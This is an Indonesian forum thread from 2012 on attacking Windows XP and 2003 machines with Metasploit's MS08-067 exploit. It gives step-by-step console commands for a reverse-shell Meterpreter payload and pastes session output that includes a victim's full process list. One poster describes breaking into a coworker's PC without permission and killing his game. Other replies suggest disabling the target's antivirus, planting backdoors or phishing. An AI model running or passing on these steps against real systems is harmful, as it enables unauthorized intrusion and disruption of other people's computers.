Exploit Windows ga pake Backdoor + ngerjain temen

iKONspirasi · 02-03-2012, 12:23 AM

klo exploit yg baru ya klo bisa buat sendiri hehe

paling mudah ya backdoor, ajak sharing file atau gmn gitu siapa tau ada port yg kebuka n bisa di exploit hehe

**geeky** · 02-03-2012, 04:34 PM

Punya sy jadi pak ..

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.5.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.5.7
[*] Meterpreter session 1 opened (192.168.5.2:4444 -> 192.168.5.7:1285) at 2012-02-03 23:29:07 +0700

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1088 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1212 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1284 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1368 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
1416 firefox.exe x86 0 CLIENT-08\Owner C:\Program Files\Mozilla Firefox\firefox.exe
1452 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1508 sched.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\sched.exe
1720 TuneUpUtilitiesApp32.exe x86 0 CLIENT-08\Owner C:\Program Files\TuneUp Utilities 2012\TuneUpUtilitiesApp32.exe
1736 FrzState2k.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
1792 explorer.exe x86 0 CLIENT-08\Owner C:\WINDOWS\Explorer.EXE
1884 igfxpers.exe x86 0 CLIENT-08\Owner C:\WINDOWS\system32\igfxpers.exe
1892 avgnt.exe x86 0 CLIENT-08\Owner C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
1916 igfxsrvc.exe x86 0 CLIENT-08\Owner C:\WINDOWS\system32\igfxsrvc.exe
1932 client008.exe x86 0 CLIENT-08\Owner C:\Program Files\Client008\client008.exe
2116 update.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\update.exe
228 avguard.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\avguard.exe
3420 Adobe_Updater.exe x86 0 CLIENT-08\Owner C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
376 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
4 System x86 0 NT AUTHORITY\SYSTEM
552 TuneUpUtilitiesService32.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\TuneUp Utilities 2012\TuneUpUtilitiesService32.exe
576 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
620 avshadow.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
624 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
648 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
692 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
728 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
876 DF5Serv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
916 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
992 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

meterpreter >

**kuch1k1** · 02-07-2012, 09:22 AM

(02-03-2012, 04:34 PM)geeky Wrote: Punya sy jadi pak ..

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.5.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.5.7
[*] Meterpreter session 1 opened (192.168.5.2:4444 -> 192.168.5.7:1285) at 2012-02-03 23:29:07 +0700

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1088 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1212 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1284 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1368 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
1416 firefox.exe x86 0 CLIENT-08\Owner C:\Program Files\Mozilla Firefox\firefox.exe
1452 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1508 sched.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\sched.exe
1720 TuneUpUtilitiesApp32.exe x86 0 CLIENT-08\Owner C:\Program Files\TuneUp Utilities 2012\TuneUpUtilitiesApp32.exe
1736 FrzState2k.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
1792 explorer.exe x86 0 CLIENT-08\Owner C:\WINDOWS\Explorer.EXE
1884 igfxpers.exe x86 0 CLIENT-08\Owner C:\WINDOWS\system32\igfxpers.exe
1892 avgnt.exe x86 0 CLIENT-08\Owner C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
1916 igfxsrvc.exe x86 0 CLIENT-08\Owner C:\WINDOWS\system32\igfxsrvc.exe
1932 client008.exe x86 0 CLIENT-08\Owner C:\Program Files\Client008\client008.exe
2116 update.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\update.exe
228 avguard.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\avguard.exe
3420 Adobe_Updater.exe x86 0 CLIENT-08\Owner C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
376 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
4 System x86 0 NT AUTHORITY\SYSTEM
552 TuneUpUtilitiesService32.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\TuneUp Utilities 2012\TuneUpUtilitiesService32.exe
576 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
620 avshadow.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
624 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
648 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
692 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
728 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
876 DF5Serv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
916 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
992 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

meterpreter >

seepphh
kembangkan yah
kalo bisa exploit tanpa backdor
di share yah Big Grin

**wine trochanter** · 02-07-2012, 11:48 AM

(01-24-2012, 03:29 PM)kuch1k1 Wrote: Permisi
si NEWBIE numpang post
maap yah om momod kalo ga bermanfaat, boleh di hapus aja

Ini sebenarnya terinspirasi dari ebooknya milik orang india
kayanya orang disni udah pada tau semua deh
tapi aku share aja siapa tau masih ada yang belom tau
disini aku ganti payloadnya pake meterpreter dan berhasil.
oke langsung aja ke tkp

Victim-nya om

Spoiler! :

Windows 2000 Universal
Windows 2003 SP1 Japanese (NO NX)
Windows 2003 SP2 English (NO NX)
Windows 2003 SP2 English (NX)
Windows 2003 SP2 German (NO NX)
Windows 2003 SP2 German (NX)
Windows XP SP2 Arabic (NX)
Windows XP SP2 Chinese - Traditional / Taiwan (NX)
Windows XP SP2 Chinese - Simplified (NX)
Windows XP SP2 Chinese - Traditional (NX)
Windows XP SP2 Czech (NX)
Windows XP SP0/SP1 Universal
Windows XP SP2 Danish (NX)
Windows XP SP2 German (NX)
Windows XP SP2 Greek (NX)
Windows XP SP2 Spanish (NX)
Windows XP SP2 Finnish (NX)
Windows XP SP2 French (NX)
Windows XP SP2 Hebrew (NX)
Windows XP SP2 Hungarian (NX)
Windows XP SP2 Italian (NX)
Windows XP SP2 Japanese (NX)
Windows XP SP2 English (AlwaysOn NX)
Windows XP SP2 Korean (NX)
Windows XP SP2 Dutch (NX)
Windows XP SP2 Norwegian (NX)
Windows XP SP2 Polish (NX)
Windows XP SP2 Portuguese - Brazilian (NX)
Windows XP SP2 Portuguese (NX)
Windows XP SP2 Russian (NX)
Windows XP SP2 Swedish (NX)
Windows XP SP2 Turkish (NX)
Windows XP SP3 Arabic (NX)
Windows XP SP2 English (NX)
Windows XP SP3 Chinese - Traditional / Taiwan (NX)
Windows XP SP3 Chinese - Simplified (NX)
Windows XP SP3 Chinese - Traditional (NX)
Windows XP SP3 Czech (NX)
Windows XP SP3 Danish (NX)
Windows XP SP3 German (NX)
Windows XP SP3 Greek (NX)
Windows XP SP3 Spanish (NX)
Windows XP SP3 Finnish (NX)
Windows XP SP3 French (NX)
Windows XP SP3 English (AlwaysOn NX)
Windows XP SP3 Hebrew (NX)
Windows XP SP3 Hungarian (NX)
Windows XP SP3 Italian (NX)
Windows XP SP3 Japanese (NX)
Windows XP SP3 Korean (NX)
Windows XP SP3 Dutch (NX)
Windows XP SP3 Norwegian (NX)
Windows XP SP3 Polish (NX)
Windows XP SP3 Portuguese - Brazilian (NX)
Windows XP SP3 Portuguese (NX)
Windows XP SP3 English (NX)
Windows XP SP3 Russian (NX)
Windows XP SP3 Swedish (NX)
Windows XP SP3 Turkish (NX)
Windows 2003 SP2 Japanese (NO NX)
Windows 2003 SP0 Universal
Windows 2003 SP1 English (NO NX)
Windows 2003 SP1 English (NX)

Attacker : Backtrack 5 r1

buka console ketik

Code:
#msfconsole

setelah terbukan metasploit consolenya langsung cari module netapi-nya ketik

Code:
msf >search netapi

setelah ketemu langsung aja ketik seperti berikut ini

Code:
use windows/smb/ms08_067_netapi >set LHOST 192.168.0.126 <== IP Attacker >set RHOST 192.168.0.115 <== IP Victim >set payload windows/meterpreter/reverse_tcp >exploit

Jika berhasil maka akan seperti berikut

Spoiler! :

setelah itu terserah deh om mau apain tuh target
kalo aku isengin temen satu kerjaan yang kerjaannya maen game terus
simpel aja cara buat isenginnya

Code:
meterpreter >ps

maka akan tampil

Spoiler! :

langsung aku kill aja tuh game eco.exe nya dengan perintah

Code:
meterpreter >kill 2920

langsung DC tuh game
hehehhe
maap yah tmn ku abis maen game mulu sih

sekian yang bisa aku sampaikan
semoga bisa bermafaat

CMIIW

kok punya ku jawabannya gini ya?
msf exploit(ms08_067_netapi) > set RHOST 10.10.19.10
RHOST => 10.10.19.10
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.19.75:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
mohon bantuannya yah

iKONspirasi · 02-07-2012, 11:53 AM

Quote:kok punya ku jawabannya gini ya?
msf exploit(ms08_067_netapi) > set RHOST 10.10.19.10
RHOST => 10.10.19.10
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.19.75:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
mohon bantuannya yah

coba matiin firewall n antivirus target pasti bisa Big Grin

**wine trochanter** · 02-07-2012, 11:57 AM

(02-07-2012, 11:53 AM)konspirasi Wrote:
Quote:kok punya ku jawabannya gini ya?
msf exploit(ms08_067_netapi) > set RHOST 10.10.19.10
RHOST => 10.10.19.10
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.19.75:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
mohon bantuannya yah

coba matiin firewall n antivirus target pasti bisa

cara mematikan firewall dan antivirus di target bagaimana pak?

iKONspirasi · 02-07-2012, 12:04 PM

samperin, trus bilang mas/mbak itu firewall n antivirusnya bikin exploit saya gagal......wkwkwkwkwk

intinya, itu ms08_067_netapi adalah exploit lama (dari tahunnya aja 2008 a.k.a ms08), coba lihat disini:
https://technet.microsoft.com/en-us/secu...n/ms08-067

disitu tulisannya Published: Thursday, October 23, 2008

jadi sejak tanggal tersebut selama OS Windowsnya diupdate secara berkala maka ga akan mempan lagi di exploitasi dengan cara diatas.

yg bisa:
OS bajakan yg ga bisa update + tanpa antivirus handal

**wine trochanter** · 02-07-2012, 12:20 PM

(02-07-2012, 12:04 PM)konspirasi Wrote: samperin, trus bilang mas/mbak itu firewall n antivirusnya bikin exploit saya gagal......wkwkwkwkwk

intinya, itu ms08_067_netapi adalah exploit lama (dari tahunnya aja 2008 a.k.a ms08), coba lihat disini:
https://technet.microsoft.com/en-us/secu...n/ms08-067

disitu tulisannya Published: Thursday, October 23, 2008

jadi sejak tanggal tersebut selama OS Windowsnya diupdate secara berkala maka ga akan mempan lagi di exploitasi dengan cara diatas.

yg bisa:
OS bajakan yg ga bisa update + tanpa antivirus handal

hadehhh
terus bagaimana dong pak?

iKONspirasi · 02-07-2012, 12:32 PM

ada banyak cara, salah satunya bikin backdoor

atau phising seperti di S.E.T

ada semua kok materinya di forum, cari aja

**kuch1k1** · 02-08-2012, 10:48 AM

(02-07-2012, 12:04 PM)konspirasi Wrote: samperin, trus bilang mas/mbak itu firewall n antivirusnya bikin exploit saya gagal......wkwkwkwkwk

intinya, itu ms08_067_netapi adalah exploit lama (dari tahunnya aja 2008 a.k.a ms08), coba lihat disini:
https://technet.microsoft.com/en-us/secu...n/ms08-067

disitu tulisannya Published: Thursday, October 23, 2008

jadi sejak tanggal tersebut selama OS Windowsnya diupdate secara berkala maka ga akan mempan lagi di exploitasi dengan cara diatas.

yg bisa:
OS bajakan yg ga bisa update + tanpa antivirus handal

Bener bgt kata om konspirasi
ini emank buat komputer yang pake wedus bajakan aja
yang g bisa update